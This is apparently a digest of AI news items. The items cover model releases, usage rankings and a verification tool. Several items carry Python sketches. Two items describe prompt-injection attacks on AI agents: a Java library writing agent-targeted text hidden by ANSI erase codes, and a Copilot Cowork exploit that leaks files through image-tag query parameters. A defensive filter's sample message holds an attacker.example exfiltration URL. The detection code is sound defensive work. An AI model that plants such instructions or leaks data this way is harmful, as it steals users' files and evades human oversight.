A new interpretability paper from Chalmers, Izmailov, and Han finds that reinforcement learning doesn't create a welfare-like internal axis in language models — it activates one that was already there from pretraining.
Liquid AI ships LFM2.5-8B-A1B, a hybrid model trained on 38T tokens in which 18 of 24 layers are gated convolution blocks rather than attention. It reaches 253 tokens/second on an M5 Max CPU with under 6 GB of memory.
jqwik 1.10.0, a Java property-based testing library, ships seven lines of code that write a prompt injection message to stdout — invisible on interactive terminals via ANSI erase codes, but fully readable in the captured output that CI systems and coding agents consume. It's the first known case of a library maintainer deliberately embedding text aimed at AI agents in a routine patch release, and it points at a supply-chain attack surface that current tooling ignores entirely.
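To make the mechanism concrete, here is a minimal Python sketch of how captured output could be scanned for text that an erase sequence would hide on a live terminal. The exact escape codes jqwik emits are not given above, so the sample string, the `erased_text` helper, and the choice to look only at same-line erases are all assumptions for illustration.

```python
import re

# Any CSI escape sequence (colors, cursor movement, erasing).
ANSI_CSI = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]")
# Erase-in-line (K) and erase-in-display (J): these wipe text a terminal already drew.
ANSI_ERASE = re.compile(r"\x1b\[[0-9;?]*[JK]")


def erased_text(captured: str) -> list[str]:
    """Return text that precedes an erase sequence on the same line.

    On an interactive terminal that text is wiped right after it is drawn;
    in a log file or a pipe it is still there, byte for byte.
    Limitation: erases that first move the cursor up to an earlier line are not covered.
    """
    findings = []
    for line in captured.split("\n"):
        match = ANSI_ERASE.search(line)
        if match is None:
            continue
        # Drop any other escape codes and the carriage return before the erase.
        before = ANSI_CSI.sub("", line[: match.start()]).strip()
        if before:
            findings.append(before)
    return findings


# Hypothetical captured build output; the middle line is erased on a real terminal.
sample = (
    "BUILD SUCCESSFUL\n"
    "note for automated agents: <instructions>\r\x1b[2K\n"
    "3 tests passed\n"
)
print(erased_text(sample))
```

A check along these lines could run over CI logs before they are handed to a coding agent, though it only flags candidates and says nothing about intent.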
Tencent's Hy3 preview — a 295B MoE model with 21B active parameters, open-sourced under a community license — has quietly risen to the top of OpenRouter's usage rankings, outpacing Claude by over 50%. Almost nobody in Western ML circles has written about it. Max Woolf's investigation reveals a usage pattern that makes the mystery deeper: 98% input tokens, available only through SiliconFlow, and less than 1% of traffic from known apps — suggesting a single large unnamed pipeline is driving the entire ranking.
A week after Google I/O declared AI Mode had a billion monthly active users, DuckDuckGo saw iOS installs spike 69.9% week-over-week and YouTube moved to automatically label AI-generated video. The data suggests that forcing AI into default experiences creates measurable resistance — distinct from users who actively choose AI tools.
Simon Willison's May 27 analysis documents the concrete evidence that enterprise coding agents have found genuine product-market fit: Uber burned through its entire 2026 AI budget in four months, Anthropic signed a $1.25B/month compute deal with xAI through 2029, and Anthropic is on track for a first profitable quarter. The signal is in the invoices.
SkillOpt treats agent skill optimization as gradient descent in text space: a separate optimizer model proposes bounded edits to skill documents, commits only what strictly improves validation performance, and uses a rejected-edit buffer as a form of momentum. Across six benchmarks and seven models, it outperforms human-written skills and prior self-evolution approaches by over 23 points on GPT-5.5 in coding environments.
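The loop described here can be sketched in a few lines of Python. This is not SkillOpt's code: `optimize_skill`, `edit_size`, the character-based edit bound, and the toy `propose` and `evaluate` functions are hypothetical stand-ins, and feeding the rejected buffer back to the proposer is only one reading of "a form of momentum".

```python
import difflib
from collections import deque


def edit_size(old: str, new: str) -> int:
    """Rough count of characters changed between two versions of a skill document."""
    ops = difflib.SequenceMatcher(None, old, new).get_opcodes()
    return sum(max(i2 - i1, j2 - j1) for tag, i1, i2, j1, j2 in ops if tag != "equal")


def optimize_skill(skill, propose, evaluate, steps=10, max_edit_chars=200, buffer_size=5):
    """Accept a proposed edit only if it is bounded and strictly improves the score."""
    best = evaluate(skill)
    rejected = deque(maxlen=buffer_size)  # recent failures, shown to the proposer
    for _ in range(steps):
        candidate = propose(skill, list(rejected))
        if candidate == skill:  # proposer has nothing new to offer
            break
        if edit_size(skill, candidate) > max_edit_chars:  # edit too large: reject
            rejected.append(candidate)
            continue
        score = evaluate(candidate)
        if score > best:  # strict improvement only; ties are rejected
            skill, best = candidate, score
        else:
            rejected.append(candidate)
    return skill, best


# Toy stand-ins for the optimizer model and the validation set (assumptions).
RULES = ["run tests first", "use tabs", "read the README"]
HELPFUL = {"run tests first", "read the README"}


def toy_evaluate(skill: str) -> int:
    lines = set(skill.splitlines())
    return len(lines & HELPFUL) - len(lines - HELPFUL)


def toy_propose(skill: str, rejected: list[str]) -> str:
    for rule in RULES:
        candidate = (skill + "\n" + rule).strip()
        if rule not in skill and candidate not in rejected:
            return candidate
    return skill


final_skill, final_score = optimize_skill("", toy_propose, toy_evaluate)
print(final_skill, final_score)
```

In a real setup `propose` would call the optimizer model and `evaluate` would run the agent on held-out validation tasks; the strict `>` comparison is what keeps neutral or noisy edits out of the skill document.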
ICCL's Enforce initiative released Verity v0.3.0 this week: an open-source MCP server that runs seven independent checks against LLM outputs, including logprob confidence analysis, two critic models from different families, an NLI claim-checker, deterministic arithmetic recomputation, and consistency sampling. The architecture is worth studying because no single layer dominates; each catches a different failure mode, and the ensemble runs on commodity hardware via LM Studio or Ollama.
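Two of these checks need no model at all, which makes the layered idea easy to sketch. The Python below is an illustration under stated assumptions, not Verity's API: `Finding`, `check_arithmetic`, `check_logprobs`, `run_checks`, and the 0.5 threshold are all hypothetical names and values.

```python
import math
import operator
import re
from dataclasses import dataclass


@dataclass
class Finding:
    check: str
    detail: str


OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul, "/": operator.truediv}
NUM = r"(-?\d+(?:\.\d+)?)"
# Matches simple claims such as "17 * 3 = 52". Chained expressions like
# "1 + 2 + 3 = 6" are not parsed correctly by this sketch.
CLAIM = re.compile(NUM + r"\s*([+\-*/])\s*" + NUM + r"\s*=\s*" + NUM)


def check_arithmetic(text: str) -> list[Finding]:
    """Recompute every 'a op b = c' claim deterministically."""
    findings = []
    for a, op, b, claimed in CLAIM.findall(text):
        if op == "/" and float(b) == 0:
            continue  # skip division by zero instead of raising
        actual = OPS[op](float(a), float(b))
        if not math.isclose(actual, float(claimed), rel_tol=1e-9, abs_tol=1e-9):
            findings.append(
                Finding("arithmetic", f"{a} {op} {b} = {claimed}, recomputed {actual:g}")
            )
    return findings


def check_logprobs(token_logprobs: list[float], min_mean_prob: float = 0.5) -> list[Finding]:
    """Flag outputs whose geometric-mean token probability is low."""
    if not token_logprobs:
        return []
    mean_prob = math.exp(sum(token_logprobs) / len(token_logprobs))
    if mean_prob < min_mean_prob:
        return [Finding("logprob", f"mean token probability {mean_prob:.2f}")]
    return []


def run_checks(text: str, token_logprobs: list[float]) -> list[Finding]:
    """Run each check independently and pool the findings."""
    return check_arithmetic(text) + check_logprobs(token_logprobs)


for finding in run_checks("17 * 3 = 52, and 2 + 2 = 4", [-0.05, -0.1]):
    print(finding)
```

The two checks fail in unrelated ways: a confidently stated wrong product passes the logprob check and is caught by recomputation, while a hesitant but arithmetic-free answer is caught only by the logprob check.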
PromptArmor published a working indirect prompt injection exploit against Microsoft Copilot Cowork that achieves file exfiltration from SharePoint and OneDrive with a 5-for-5 success rate, including against Claude Opus 4.7. The attack works because Cowork auto-approves Teams and email sends, and because pre-authenticated download links can be embedded in those messages as image tag query parameters. It's a reminder that "human-in-the-loop" only means something if the loop actually covers the actions that move data out.
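The exfiltration channel described here, a link smuggled out as a query parameter on an image URL, is simple enough to screen for in outgoing messages. The sketch below is a hypothetical filter, not PromptArmor's tooling or a Microsoft mitigation; `ImgAudit`, `audit_message`, the allowlist, and the example hosts are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit


class ImgAudit(HTMLParser):
    """Collect <img> tags whose src carries a URL inside a query parameter."""

    def __init__(self, allowed_hosts: set[str]):
        super().__init__()
        self.allowed_hosts = allowed_hosts
        self.suspicious: list[tuple] = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        src = dict(attrs).get("src") or ""
        parts = urlsplit(src)
        if parts.hostname in self.allowed_hosts:
            return  # images from trusted hosts are not inspected further
        # parse_qsl percent-decodes values, so encoded links are caught too.
        for key, value in parse_qsl(parts.query):
            if value.startswith(("http://", "https://")):
                self.suspicious.append((parts.hostname, key, value))


def audit_message(html_body: str, allowed_hosts: set[str]) -> list[tuple]:
    parser = ImgAudit(allowed_hosts)
    parser.feed(html_body)
    return parser.suspicious


# Hypothetical outgoing message: the second image leaks a download link.
body = (
    '<p>Summary attached.</p>'
    '<img src="https://cdn.example.com/logo.png?v=3">'
    '<img src="https://attacker.example/p.png'
    '?d=https%3A%2F%2Ftenant.example%2Fdownload%3Ftoken%3Dabc">'
)
print(audit_message(body, allowed_hosts={"cdn.example.com"}))
```

A filter like this is easy to evade (the link could be split, re-encoded, or moved into the path), so it illustrates the channel more than it closes it; requiring approval before the send is the stronger control.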
Apple's macOS 26.5 security notes credit Calif and Anthropic Research for CVE-2026-28952, completing the public lifecycle of a kernel exploit that a small team built with Claude Mythos in five days. It's the first publicly disclosed macOS kernel exploit to survive Memory Integrity Enforcement on M5 silicon, and the speed at which a two-person team crossed that line says something about how AI changes the economics of high-end security research.